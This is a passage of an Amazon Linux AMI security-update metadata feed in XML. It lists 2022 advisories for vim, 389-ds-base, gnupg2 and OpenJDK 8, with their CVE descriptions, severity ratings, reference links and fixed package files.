name="tomcat8-el-3.0-api" version="8.5.81" release="1.91.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.81-1.91.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.81" release="1.91.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.81-1.91.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.81" release="1.91.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.81-1.91.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.81" release="1.91.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.81-1.91.amzn1.noarch.rpm</filename></package><package 
name="tomcat8-admin-webapps" version="8.5.81" release="1.91.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.81-1.91.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1628</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1628: medium priority package update for vim</title><issued date="2022-07-28 20:41:00" /><updated date="2022-08-04 23:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-2231:
NULL Pointer Dereference in GitHub repository vim/vim prior to 8.2.
CVE-2022-2210:
Out-of-bounds Write in GitHub repository vim/vim prior to 8.2.
CVE-2022-2208:
NULL Pointer Dereference in GitHub repository vim/vim prior to 8.2.5163.
CVE-2022-2207:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.
CVE-2022-2206:
Out-of-bounds Read in GitHub repository vim/vim prior to 8.2.
CVE-2022-2183:
Out-of-bounds Read in GitHub repository vim/vim prior to 8.2.
CVE-2022-2182:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.
CVE-2022-2175:
A heap buffer over-read vulnerability was found in Vim's put_on_cmdline() function of the src/ex_getln.c file. This issue occurs due to invalid memory access when using an expression on the command line. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering a heap buffer overflow that causes an application to crash and corrupt memory.
CVE-2022-2129:
Out-of-bounds Write in GitHub repository vim/vim prior to 8.2.
CVE-2022-2126:
Out-of-bounds Read in GitHub repository vim/vim prior to 8.2.
CVE-2022-2125:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.
CVE-2022-2124:
Buffer Over-read in GitHub repository vim/vim prior to 8.2.
CVE-2022-2042:
A heap use-after-free vulnerability was found in Vim's skipwhite() function of the src/charset.c file. This flaw occurs because of an uninitialized attribute value and freed memory in the spell command. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering a heap use-after-free that causes an application to crash and corrupt memory.
CVE-2022-2000:
An out-of-bounds write vulnerability was found in Vim's append_command() function of the src/ex_docmd.c file. This issue occurs when an error for a command goes over the end of IObuff. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering a heap buffer overflow that causes an application to crash and corrupt memory.
CVE-2022-1968:
A flaw was found in vim. The vulnerability occurs due to illegal memory access and leads to a use-after-free vulnerability in the utf_ptr2char function. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-1942:
An out-of-bounds write vulnerability was found in Vim's vim_regsub_both() function in the src/regexp.c file. The flaw can open a command-line window from a substitute expression when a text or buffer is locked. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering an out-of-bounds write that causes an application to crash, possibly reading and modifying some amount of memory contents.
CVE-2022-1927:
A flaw was found in vim. The vulnerability occurs due to illegal memory access and leads to a buffer over-read vulnerability in the utf_ptr2char function. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-1898:
A flaw was found in vim. The vulnerability occurs due to illegal memory access and leads to a use-after-free vulnerability in the find_pattern_in_path function. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-1897:
A flaw was found in vim. The vulnerability occurs due to illegal memory access and leads to an out-of-bounds write vulnerability in the vim_regsub_both function. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-1886:
A heap buffer overflow flaw was found in Vim's utf_head_off() function in the mbyte.c file. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering a heap buffer overflow that causes an application to crash, leading to a denial of service and possibly some amount of memory leak.
CVE-2022-1851:
A flaw was found in vim. The vulnerability occurs due to illegal memory access and leads to an out-of-bounds read vulnerability in the gchar_cursor function. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-1796:
A flaw was found in vim. The vulnerability occurs due to illegal memory access and leads to a use-after-free vulnerability. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-1785:
A flaw was found in vim. The vulnerability occurs due to illegal memory access and leads to an out-of-bounds write vulnerability in the ex_cmds function. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-1771:
A flaw was found in vim. The vulnerability occurs due to illegal memory access and leads to a stack-based buffer overflow vulnerability. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-1769:
Buffer Over-read in GitHub repository vim/vim prior to 8.2.4974.
CVE-2022-1735:
Classic Buffer Overflow in GitHub repository vim/vim prior to 8.2.4969.
CVE-2022-1733:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.4968.
CVE-2022-1725:
NULL Pointer Dereference in GitHub repository vim/vim prior to 8.2.495
CVE-2022-1720:
A heap buffer over-read vulnerability was found in Vim's grab_file_name() function of the src/findfile.c file. This flaw occurs because the function reads after the NULL terminates the line with "gf" in Visual block mode. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering a heap buffer over-read vulnerability that causes an application to crash and corrupt memory.
CVE-2022-1674:
A NULL pointer dereference flaw was found in vim's vim_regexec_string() function in regexp.c file. The issue occurs when the function tries to match the buffer with an invalid pattern. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering a NULL pointer dereference that causes an application to crash, leading to a denial of service.
CVE-2022-1629:
Buffer Over-read in function find_next_quote in GitHub repository vim/vim prior to 8.2.4925. This vulnerability is capable of crashing software, modifying memory, and possibly enabling remote execution.
CVE-2022-1621:
Heap buffer overflow in vim_strncpy find_word in GitHub repository vim/vim prior to 8.2.4919. This vulnerability is capable of crashing software, bypassing a protection mechanism, modifying memory, and possibly enabling remote execution.
CVE-2022-1620:
NULL Pointer Dereference in function vim_regexec_string at regexp.c:2729 in GitHub repository vim/vim prior to 8.2.4901. This allows attackers to cause a denial of service (application crash) via a crafted input.
CVE-2022-1619:
Heap-based Buffer Overflow in function cmdline_erase_chars in GitHub repository vim/vim prior to 8.2.4899. This vulnerability is capable of crashing software, modifying memory, and possibly enabling remote execution.
CVE-2022-1616:
Use after free in append_command in GitHub repository vim/vim prior to 8.2.4895. This vulnerability is capable of crashing software, bypassing a protection mechanism, modifying memory, and possibly enabling remote execution.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1616" title="" id="CVE-2022-1616" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1619" title="" id="CVE-2022-1619" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1620" title="" id="CVE-2022-1620" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1621" title="" id="CVE-2022-1621" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1629" title="" id="CVE-2022-1629" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1674" title="" id="CVE-2022-1674" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1720" title="" id="CVE-2022-1720" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1725" title="" id="CVE-2022-1725" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1733" title="" id="CVE-2022-1733" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1735" title="" id="CVE-2022-1735" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1769" title="" id="CVE-2022-1769" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1771" title="" id="CVE-2022-1771" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1785" title="" id="CVE-2022-1785" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1796" title="" id="CVE-2022-1796" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1851" title="" id="CVE-2022-1851" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1886" title="" id="CVE-2022-1886" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1897" title="" id="CVE-2022-1897" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1898" title="" id="CVE-2022-1898" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1927" title="" id="CVE-2022-1927" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1942" title="" id="CVE-2022-1942" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1968" title="" id="CVE-2022-1968" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2000" title="" id="CVE-2022-2000" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2042" title="" id="CVE-2022-2042" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2124" title="" id="CVE-2022-2124" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2125" title="" id="CVE-2022-2125" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2126" title="" id="CVE-2022-2126" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2129" title="" id="CVE-2022-2129" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2175" title="" id="CVE-2022-2175" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2182" title="" id="CVE-2022-2182" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2183" title="" id="CVE-2022-2183" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2206" title="" id="CVE-2022-2206" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2207" title="" id="CVE-2022-2207" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2208" title="" id="CVE-2022-2208" 
type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2210" title="" id="CVE-2022-2210" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2231" title="" id="CVE-2022-2231" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-debuginfo" version="8.2.5172" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-8.2.5172-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="8.2.5172" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-8.2.5172-1.1.amzn1.noarch.rpm</filename></package><package name="vim-enhanced" version="8.2.5172" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-8.2.5172-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-common" version="8.2.5172" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-8.2.5172-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-data" version="8.2.5172" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-8.2.5172-1.1.amzn1.noarch.rpm</filename></package><package name="vim-minimal" version="8.2.5172" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-8.2.5172-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="8.2.5172" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-8.2.5172-1.1.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="8.2.5172" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-8.2.5172-1.1.amzn1.i686.rpm</filename></package><package name="vim-common" version="8.2.5172" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-8.2.5172-1.1.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="8.2.5172" release="1.1.amzn1" epoch="2" 
arch="i686"><filename>Packages/vim-enhanced-8.2.5172-1.1.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1629</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1629: low priority package update for 389-ds-base</title><issued date="2022-08-15 18:37:00" /><updated date="2022-08-22 23:58:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-4091:
A double free was found in the way 389-ds-base handles virtual attributes context in persistent searches. An attacker could send a series of search requests, forcing the server to behave unexpectedly, and crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4091" title="" id="CVE-2021-4091" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-snmp" version="1.3.10.2" release="16.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-snmp-1.3.10.2-16.69.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.10.2" release="16.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.10.2-16.69.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.10.2" release="16.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.10.2-16.69.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.10.2" release="16.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.10.2-16.69.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.10.2" release="16.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.10.2-16.69.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.10.2" release="16.69.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.10.2-16.69.amzn1.i686.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.10.2" release="16.69.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-snmp-1.3.10.2-16.69.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.10.2" release="16.69.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.10.2-16.69.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.10.2" release="16.69.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.10.2-16.69.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.10.2" release="16.69.amzn1" epoch="0" 
arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.10.2-16.69.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1630</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1630: medium priority package update for gnupg2</title><issued date="2022-08-15 18:37:00" /><updated date="2022-08-22 23:58:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-34903:
A vulnerability was found in GnuPG. This issue occurs due to an escape detection loop at the write_status_text_and_buffer() function in g10/cpr.c. This flaw allows a malicious actor to bypass access control.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903" title="" id="CVE-2022-34903" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnupg2-smime" version="2.0.28" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-smime-2.0.28-2.35.amzn1.x86_64.rpm</filename></package><package name="gnupg2" version="2.0.28" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-2.0.28-2.35.amzn1.x86_64.rpm</filename></package><package name="gnupg2-debuginfo" version="2.0.28" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-debuginfo-2.0.28-2.35.amzn1.x86_64.rpm</filename></package><package name="gnupg2-smime" version="2.0.28" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-smime-2.0.28-2.35.amzn1.i686.rpm</filename></package><package name="gnupg2" version="2.0.28" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-2.0.28-2.35.amzn1.i686.rpm</filename></package><package name="gnupg2-debuginfo" version="2.0.28" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-debuginfo-2.0.28-2.35.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1631</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1631: important priority package update for java-1.8.0-openjdk</title><issued date="2022-08-15 18:37:00" /><updated date="2022-08-22 23:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-34169:
The Xalan Java XSLT library has an integer truncation issue when processing malicious stylesheets. This can be used to corrupt Java class files generated by the internal XSLTC compiler and execute arbitrary Java bytecode.
CVE-2022-21541:
MethodHandle.invokeBasic() method can be accessed on byte code level from an arbitrary class.
CVE-2022-21540:
Generated code produced by C1 may leak a package-private class to a class from a different package.
CVE-2022-21496:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JNDI). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).
CVE-2022-21476:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
CVE-2022-21443:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21434:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).
CVE-2022-21426:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21365:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: ImageIO). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21360:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: ImageIO). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21349:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: 2D). Supported versions that are affected are Oracle Java SE: 7u321, 8u311; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21341:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Serialization). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21340:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21305:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).
CVE-2022-21299:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). 